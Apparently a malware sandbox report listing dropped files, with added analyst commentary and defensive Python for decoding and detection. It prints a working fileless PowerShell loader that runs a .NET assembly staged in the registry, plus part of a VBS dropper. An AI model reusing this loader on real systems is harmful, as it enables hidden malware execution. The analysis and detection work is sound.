                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="554629" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                Process:C:\Windows\System32\wermgr.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):7228
                                                                Entropy (8bit):3.6849038638877993
                                                                Encrypted:false
                                                                SSDEEP:192:R6l7wVeJQk0Cif6YSh2XbGgmftvcBppRZm:R6lXJQfCif6Yk26gmft0k
                                                                MD5:C7DF7B6821B2C3C306CA481DFBABA1D7
                                                                SHA1:6624ADFB61F9653165AD7D4339A7CE55553FB9D7
                                                                SHA-256:5339817CC94F9E1C8418272E811D54E0FACD97E6D58DAB901086594CEDEBB710
                                                                SHA-512:EAC5CE2AAF61782F7C8E0C2C314FF3D784BD6331B0EAD520111D971BF75D4E391AE74CD1E921CFB67098FF783CBF98BCE9D9D1C9B60BF65B7FFAFCF0057C61DE
                                                                Malicious:false
                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.7.6.<./.P.i.
                                                                Process:C:\Windows\System32\wermgr.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):4711
                                                                Entropy (8bit):4.509051390600491
                                                                Encrypted:false
                                                                SSDEEP:96:uIjfBI7G37VdJFKl0F3DFt28WTnF3DFF/ufPd:uIlYG37x4EwVfufF
                                                                MD5:FDA66F5903A1D4BE4B4C00AADCD61D45
                                                                SHA1:8FBBDBD48885F9A3DA6029A816DBC4744D3B9D3E
                                                                SHA-256:6D473CEE9A6B517AB08FAC51567AF2AEEAAFF12424187DBC9427DEF6457F54B5
                                                                SHA-512:23A6A44C9670616B76B4CB22FE827EAA3FE8E2872E494D5225FEC30A0BE0DFABC2763ECA236B9BEF520C679EF3A8B0996C9F41948425FC2BFA2D33547CA775AC
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="554629" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):11887
                                                                Entropy (8bit):4.901437212034066
                                                                Encrypted:false
                                                                SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdR2Ca6pZlbjvwRjdHPRhAgkjDt4iWN3yBGHVQ9sY:Srib4ZoopbjvwRjdvRNkjh4iUxsNYW6m
                                                                MD5:DDAC12D6036E986FE7B5A5E062A8CC14
                                                                SHA1:FA891410075C9E647754E894CDCB14751FE9E3C7
                                                                SHA-256:B3B4B4AF761334818B7924740A84E55CE8ECA480F13077854469E8D9C7C1DF7E
                                                                SHA-512:F7BD65E3B361D0F02B541273A6D99BD1F6B438F2304D4F061C262164166E4FAB6F56614CFD1C44A0D99C9E1A1B46D5DF0138A4656F96B7390162F54E1679B776
                                                                Malicious:false
                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):3260
                                                                Entropy (8bit):5.402789045006677
                                                                Encrypted:false
                                                                SSDEEP:96:vkU1zlHyIFKL2O9qrh7Kf+2J5Eo9AdrxwF:vz1yt2jrAVLL2a
                                                                MD5:992E42D1FA15F73BDD0184387A0F8CE7
                                                                SHA1:4C1D9E270A198B72ABB50525895F491732C6BB13
                                                                SHA-256:31B2DD018BFE02C0B5A2F2871C0C385F5F9D33A8A31522E9F1DCF1C122BA9E6E
                                                                SHA-512:DEB26838E45C25ED33CA34CFB86FE69A5D0DDBFF2B29145DEDD1B7F54AF2629224674408A5C78D1239C273946AF895C228CF43E7A7A084C6CEC51572D88B51CE
                                                                Malicious:false
                                                                Preview:@...e...........................................................H..............@-....f.J.|.7h8..r.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):252
                                                                Entropy (8bit):5.401985169194339
                                                                Encrypted:false
                                                                SSDEEP:6:xVwe5ljxsu2xKbLtSXqo83gMXTBDEoXZuBiA2V0LYERmBPyXFI59:772EtSXqd5ZEoJci1V0LYEIyo
                                                                MD5:73622137D903689DFEBD28DD0A5B17A8
                                                                SHA1:63AC79ADE35AB949BE311604267239D322CE42C1
                                                                SHA-256:CE201780D48B4687EA1F3D0F66DB0E415E9CF8653C297D466AA6B688213B03CC
                                                                SHA-512:D7E6728A57DF3D33FFC0ADFBCB6C376BD885AE43EE4EF44320AFCC3AAE22DAA19DD08DF5B3B8197F212B97F40E6E6863E3CB6F9909037F78D993EC850384DEF0
                                                                Malicious:false
                                                                Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\dirDChDJoZeRjid' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('dirDChDJoZeRjid')..Stop-Process -Name conhost -Force..
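The 252-byte history file above is the PowerShell stage in clear: it reads value `s` under `HKCU:\Software\dirDChDJoZeRjid`, reverses the string character by character (`$_[-1..-($_.Length)]`), base64-decodes the result and hands the bytes to `[AppDomain]::CurrentDomain.Load`, so the next stage is a .NET assembly that is never written to disk as a file; `[b.b]::b('dirDChDJoZeRjid')` then calls into that assembly with the key name, and `Stop-Process -Name conhost -Force` closes the visible console. The Python below is an added example, not part of the Joe Sandbox report or of the sample, for recovering and triaging such a value offline from an exported copy of the key; the PE it is exercised with is constructed here and is not the sample's payload.

```python
import base64
import struct


def unstage_registry_value(value) -> bytes:
    """Undo the loader's staging: value 's' holds a reversed base64 string.
    PowerShell's unary -join first concatenates a REG_MULTI_SZ into one
    string, $_[-1..-($_.Length)] reverses the characters, and
    [Convert]::FromBase64String decodes (ignoring whitespace, as .NET does)."""
    joined = "".join(value) if isinstance(value, (list, tuple)) else value
    reversed_text = "".join(joined[::-1].split())
    return base64.b64decode(reversed_text, validate=True)


def stage_like_the_loader(payload: bytes) -> str:
    """Inverse of unstage_registry_value; only used to build test input."""
    return base64.b64encode(payload).decode("ascii")[::-1]


def pe_summary(data: bytes) -> dict:
    """Header-level triage of what [AppDomain]::CurrentDomain.Load receives.
    Assembly.Load(byte[]) only succeeds on a PE image with a CLR header
    (data directory 14), so a populated directory tells the analyst the blob
    is a managed assembly without executing anything."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"is_pe": False}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"is_pe": False}
    machine, sections = struct.unpack_from("<HH", data, e_lfanew + 4)
    opt = e_lfanew + 24                      # start of the optional header
    magic = struct.unpack_from("<H", data, opt)[0]
    pe32plus = magic == 0x20B
    # Data directories start 96 bytes into a PE32 optional header, 112 for PE32+.
    clr_dir = opt + (112 if pe32plus else 96) + 14 * 8
    has_clr = False
    if clr_dir + 8 <= len(data):
        rva, size = struct.unpack_from("<II", data, clr_dir)
        has_clr = rva != 0 and size != 0
    return {"is_pe": True, "machine": machine, "sections": sections,
            "pe32plus": pe32plus, "has_clr_header": has_clr}


def build_fake_dotnet_pe() -> bytes:
    """Constructed test input (not the sample's payload): a header-only PE32
    image whose CLR data directory is populated. It is not loadable and only
    exercises the parser."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 224, 0x2022)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)  # CLR header RVA, size
    return bytes(dos) + coff + bytes(opt)


def triage_staged_value(value) -> dict:
    """Everything worth knowing from an exported copy of HKCU\\Software\\<key>\\s."""
    payload = unstage_registry_value(value)
    return {"payload_size": len(payload), **pe_summary(payload)}


if __name__ == "__main__":
    staged = stage_like_the_loader(build_fake_dotnet_pe())
    print(triage_staged_value(staged))
```

If the exported value was a REG_MULTI_SZ, pass the list of strings in registry order; that is what the loader's `-join` sees. Once `has_clr_header` is true, the recovered bytes go straight to a .NET decompiler to read `b.b.b` and whatever it pulls from the same key.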
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7015427903408895
                                                                Encrypted:false
                                                                SSDEEP:96:8QwFdCteo7kvhkvCCtc23a+MHP23a+xHU:8QwFQeUc23+23M
                                                                MD5:4F2B713B6EBE6F92A346F9CE41A4F7A4
                                                                SHA1:33940515D07A15DB9F662E3CF9900E71F0113C1F
                                                                SHA-256:6979972E8E09B0C8C03B17239CD71F64FCA6C6C6DCA830EB4C0A0E0FAD679FD3
                                                                SHA-512:40A878D9B41BAC851C5D9C3BAE8E0E7BA4841C718DE771EA739B9984DA890986BBD03B05E51FEDDC766E2CFFF0C00909FA6EB280932C23A474168F2853E75E7F
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d.......(.].$..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........V.$.....].$......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlVY.e....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....VY.e..Roaming.@......DWSlVY.e....C.......................5.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlVY.e....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlDW.r....E......................$..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlDW.q....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlDW.q....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlVY.e....q...........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7015427903408895
                                                                Encrypted:false
                                                                SSDEEP:96:8QwFdCteo7kvhkvCCtc23a+MHP23a+xHU:8QwFQeUc23+23M
                                                                MD5:4F2B713B6EBE6F92A346F9CE41A4F7A4
                                                                SHA1:33940515D07A15DB9F662E3CF9900E71F0113C1F
                                                                SHA-256:6979972E8E09B0C8C03B17239CD71F64FCA6C6C6DCA830EB4C0A0E0FAD679FD3
                                                                SHA-512:40A878D9B41BAC851C5D9C3BAE8E0E7BA4841C718DE771EA739B9984DA890986BBD03B05E51FEDDC766E2CFFF0C00909FA6EB280932C23A474168F2853E75E7F
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d.......(.].$..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........V.$.....].$......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlVY.e....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....VY.e..Roaming.@......DWSlVY.e....C.......................5.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlVY.e....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlDW.r....E......................$..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlDW.q....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlDW.q....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlVY.e....q...........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7015427903408895
                                                                Encrypted:false
                                                                SSDEEP:96:8QwFdCteo7kvhkvCCtc23a+MHP23a+xHU:8QwFQeUc23+23M
                                                                MD5:4F2B713B6EBE6F92A346F9CE41A4F7A4
                                                                SHA1:33940515D07A15DB9F662E3CF9900E71F0113C1F
                                                                SHA-256:6979972E8E09B0C8C03B17239CD71F64FCA6C6C6DCA830EB4C0A0E0FAD679FD3
                                                                SHA-512:40A878D9B41BAC851C5D9C3BAE8E0E7BA4841C718DE771EA739B9984DA890986BBD03B05E51FEDDC766E2CFFF0C00909FA6EB280932C23A474168F2853E75E7F
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d.......(.].$..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........V.$.....].$......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlVY.e....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....VY.e..Roaming.@......DWSlVY.e....C.......................5.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlVY.e....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlDW.r....E......................$..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlDW.q....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlDW.q....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlVY.e....q...........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.700906988898656
                                                                Encrypted:false
                                                                SSDEEP:48:Da9s/JCVbU2H+6BukvhkvklCyw8n2k2qqa+lIjSogZofE2qqa+lIjSogZoz1:+9QJCG97kvhkvCCtc23a+xHP23a+xHU
                                                                MD5:BA6F050EE8307A631209DF5FA4BFFB87
                                                                SHA1:A8F4976A73F3C65A04B180A2E5B9A3F0CAD72307
                                                                SHA-256:25F717A614DEF91B646BD4C8EA75EDB7F874B4745AFC7AB9EB5A7745E0333EF9
                                                                SHA-512:83744DBABB9AD085FA5C5CFB94F97DBD49BCD188AFC34522B94B996443B01FF3B9CA596E7E3673461559E4A8F9C96CC29A8CDCD3D33244B5F797CE55E7CA91A5
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d........b.$..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........V.$.....f.$......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlVY.e....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....VY.e..Roaming.@......DWSlVY.e....C.......................5.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlVY.e....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlVY.e....E......................$..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlVY.e....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlVY.e....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlVY.e....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlVY.e....q...........
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:ISO-8859 text
                                                                Category:dropped
                                                                Size (bytes):2809
                                                                Entropy (8bit):4.971159920674946
                                                                Encrypted:false
                                                                SSDEEP:48:jQn8VxQ2Ii7jnHilEfzcub6OtzFnc3mqgjHVWRWvxdczYhfWgOq3WldACk8AYQAb:jQ8Vx99OOjcW7Iz08q+k9YDWg9QU
                                                                MD5:83DF580BFC1F30657B01031C6C23263A
                                                                SHA1:D7688ECB62A261B0EA6216617A4F3D5B66715536
                                                                SHA-256:BC2D8273C66E12ED28BA3A504601F26943DD950F8FAD00A51AC7112697653795
                                                                SHA-512:BFB08E2BE8F2AC17905FBCF0A4225ABA1FE4A1AC105F702BB37C96C0CC8FA84D1D81327D27112D55BA7FC3ED2B4CA60E91640F02610CB2AAD907E9A563007F28
                                                                Malicious:true
                                                                Preview:Option Explicit
                                                                
                                                                ' Project name: dirDChDJoZeRjid
                                                                ' Global variables
                                                                Dim shellSysteme, cheminWindows, compteurBoucles
                                                                Set shellSysteme = CreateObject("WScript.Shell")
                                                                cheminWindows = shellSysteme.ExpandEnvironmentStrings("%windir%")
                                                                
                                                                ' Initialise the program's parameters
                                                                Sub InitialiserProgramme()
                                                                    compteurBoucles = 0
                                                                End Sub
                                                                
                                                                ' Function to check whether a specific process is running
                                                                Function ProcessusEstActif(nomDuProcessus)
                                                                    Dim serviceWMI, listeProcessusActifs
                                                                    Set serviceWMI = GetObject("winmgmts:\\.\root\cimv2")
                                                                    Set listeProcessusActifs = serviceWMI.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & nomDuProcessus & "'")
                                                                
                                                                    ProcessusEstActif = (listeProcessusActifs.Count > 0)
                                                                End Function
                                                                
                                                                ' Procedure to launch PowerShell
                                                                Sub LancerPowerShell()
                                                                    shellSysteme.Run cheminWindows & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2
                                                                End Sub
                                                                
                                                                ' Function to find a running PowerShell process
                                                                Function Rechercher
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Non-ISO extended-ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                                                                Category:dropped
                                                                Size (bytes):1605
                                                                Entropy (8bit):4.425749981547822
                                                                Encrypted:false
                                                                SSDEEP:24:Eip7/tkNvNa2V269+Iz5JSjeKm3uSmcHugxOAX4WLeX4WgeX4WgeX4WneX4WueXZ:EcWxZzSyjOAX+X5XpXKX/XFXoXQXDX5
                                                                MD5:2B099B22D2137B9BFD17FC56E3F69280
                                                                SHA1:1124B137D2EB3E434A0CC969D6D229EFE37599F3
                                                                SHA-256:419EAC386ACEA5A77C46B9DAC14F29DC6C0DC0A3B377CEEF11CB847B9DC137CF
                                                                SHA-512:3E7DAD6CC6B6A1FCF27B05658CB1F3E444D596822B1C56CF54A59072FDDC6028B31EBD86924773CD31C4DB9EDD010BD74E64F7449AF7F12E2C6FD12EAE3ACE98
                                                                Malicious:false
                                                                Preview:.[91m> .[0m.[93m[.[33m.[45m.[0m.[33m[.[37mA.[33m.[45m.[0m.[33m[.[37mAp.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCu.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDoma.[33m.[45m.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\dirDChDJoZeRjid'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37mb.b.[33m]::.[97mb.[33m(.[36m'dirDChDJoZeRjid'.[33m).[33m.[45m.[0m.tape 1 ..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m
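Across the dropped files the chain is visible: wscript.exe runs the decoded VBS, which starts powershell.exe minimised (`Run ..., 2`) with no arguments, and the per-keystroke rendering in the console capture directly above ("conho", "conhos", "conhost") together with the history file suggest the loader was typed into that interactive session rather than passed on the command line. A detection keyed only on the powershell.exe command line therefore sees nothing; script block logging (Event ID 4104) does. The Python below is an added example, not from the report, that runs the two checks a practitioner would want over constructed process-creation and script-block events: a script-host ancestor of powershell.exe (also through an intermediate cmd.exe, matching the "Wscript starts Powershell (via cmd or directly)" signature listed in the report), and the loader markers in command-line plus script-block text. The loader text is copied from the history file above; the event records are constructed.

```python
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Markers taken from the loader text in the dropped PowerShell history file.
LOADER_MARKERS = {
    "assembly_load": re.compile(r"\[AppDomain\]::CurrentDomain\.Load\(", re.I),
    "base64": re.compile(r"FromBase64String", re.I),
    "string_reverse": re.compile(r"\$_\[-1\.\.-\(\$_\.Length\)\]"),
    "hkcu_stage": re.compile(r"HKCU:\\Software\\", re.I),
    "hide_console": re.compile(r"Stop-Process\s+-Name\s+conhost", re.I),
}

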